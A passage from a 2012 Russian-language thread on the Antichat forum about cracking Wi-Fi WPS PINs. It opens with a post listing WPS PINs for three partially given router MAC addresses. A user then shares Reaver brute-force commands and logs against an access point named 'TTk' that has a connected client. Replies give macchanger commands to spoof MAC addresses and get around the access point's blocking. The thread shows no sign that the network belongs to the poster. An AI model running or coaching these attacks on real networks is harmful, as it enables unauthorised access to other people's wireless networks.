ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

17.11.2012, 01:00
|
|
New Member
Регистрация: 01.11.2012
Сообщений: 1
Провел на форуме: 217
Репутация:
0
|
|
WPS PIN для таких MAC точек доступа:
54:04:A6:5D:50... 238373##
F81:11:32:1F... 961446##
B0:48:7A:F5:7B... 090061##
|
|
|

19.11.2012, 12:45
|
|
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме: 5129
Репутация:
0
|
|
Привет всем!
Может поможете чем...
Есть точка доступа,сигнал от -65 до ~-50db, мак 80:1F:02:06:x:x видимо точка Edimax.
Мой девайс TL-WN7200ND. Пользуюсь Wifislax 4.3, но также пробовал BT5R2,3. Начал ривером подбирать пин (reaver -i mon0 -b ... -c 9):
Код:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 80:1F:02:06:x:x
[+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
[+] Trying pin 12345670
[+] Trying pin 00005678
[+] Trying pin 01235678
[+] Trying pin 11115670
[+] Trying pin 11115670
[+] Trying pin 22225672
[+] 0.05% complete @ 2012-11-09 22:45:38 (2 seconds/pin)
Через некоторое время стали появляться ошибки, причем по логу видно что где-то через час и до утра:
Код:
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] 11.87% complete @ 2012-11-09 23:43:35 (2 seconds/pin)
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] 11.87% complete @ 2012-11-09 23:53:48 (3 seconds/pin)
...
[+] 11.87% complete @ 2012-11-10 09:57:27 (30 seconds/pin)
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
И тепер уже вторую неделю вот так (reaver -i mon0 -b ... -c 9 -vv):
Код:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 9
[+] Waiting for beacon from 80:1F:02:06:x:x
[+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
Wash все это время показывает wps no на этой точке (TTk). Также пробовал другие wifi девайсы, добавлял команды essid, уменьшал время -d...
С другими точками подбор идет...
Из за чего может быть эта ошибка-Receive timeout occurred??
Заранее Спасибо!
|
|
|

19.11.2012, 13:49
|
|
Познавший АНТИЧАТ
Регистрация: 25.02.2011
Сообщений: 1,148
Провел на форуме: 353490
Репутация:
110
|
|
Сообщение от pav087
...
Из за чего может быть эта ошибка-Receive timeout occurred??
Заранее Спасибо!
Думается варианта тут всего два:
1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.
2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.
|
|
|

19.11.2012, 15:30
|
|
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме: 5129
Репутация:
0
|
|
Сообщение от Buran
Думается варианта тут всего два:
1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.
2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.
Сигнал до точки остался такой-же, даже в некоторых местах доходит до -45db.
По мак блокировку думаю маловероятно, после этого с других wifi карт пробовал, тоже самое получалось... На точке есть клиент, я пробовал подставлять в ривер мак клиента через команду -m...
Делал так:
Код:
ifconfig wlan0 down
macchanger -m (мак клиента) wlan0
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b (мак точка) -c 9 -m (мак клиента) -vv
handshake ловится практически сразу, но брут не помогает...
|
|
|

19.11.2012, 16:00
|
|
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
Провел на форуме: 1052005
Репутация:
131
|
|
тема для брута http://forum.antichat.ru/thread274700.html
|
|
|

19.11.2012, 16:04
|
|
Познавший АНТИЧАТ
Регистрация: 25.02.2011
Сообщений: 1,148
Провел на форуме: 353490
Репутация:
110
|
|
Сообщение от pav087
Делал так...
Нужно сменить МАС-адрес на интерфейсе. Делаем так:
Код:
ifconfig mon0 down
macchanger -m 00:01:02:aa:bb:cc mon0
ifconfig mon0 up
Это будет совсем другое дело. Macchanger берём здесь если нету.
|
|
|

19.11.2012, 17:11
|
|
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме: 5129
Репутация:
0
|
|
Сообщение от Buran
Нужно сменить МАС-адрес на интерфейсе. Делаем так:
Код:
ifconfig mon0 down
macchanger -m 00:01:02:aa:bb:cc mon0
ifconfig mon0 up
Это будет совсем другое дело. Macchanger берём здесь если нету.
Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?
|
|
|

20.11.2012, 09:02
|
|
Познавший АНТИЧАТ
Регистрация: 25.02.2011
Сообщений: 1,148
Провел на форуме: 353490
Репутация:
110
|
|
Сообщение от pav087
Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?
Нет.
|
|
|

20.11.2012, 10:36
|
|
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме: 5129
Репутация:
0
|
|
В общем попробовал с маком клиента, та же беда и когда клиент есть, и когда нету, сыпятся ошибки - [!] WARNING: Receive timeout occurred... Сигнал до точки ~ -59db. Клиента ~ -56db.
Может точка заблокировала WPS до перезагрузки?
Ведь как только начал подбирать, дошло до 11% за час...
Может есть какие-нибудь еще идеи?
|
|
|

20.11.2012, 12:10
|
|
Познавший АНТИЧАТ
Регистрация: 25.02.2011
Сообщений: 1,148
Провел на форуме: 353490
Репутация:
110
|
|
Сообщение от pav087
Может есть какие-нибудь еще идеи?
На какой МАС меняли в интерфейсе mon0? Попробуйте вообще не менять МАС. Иногда помогает.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|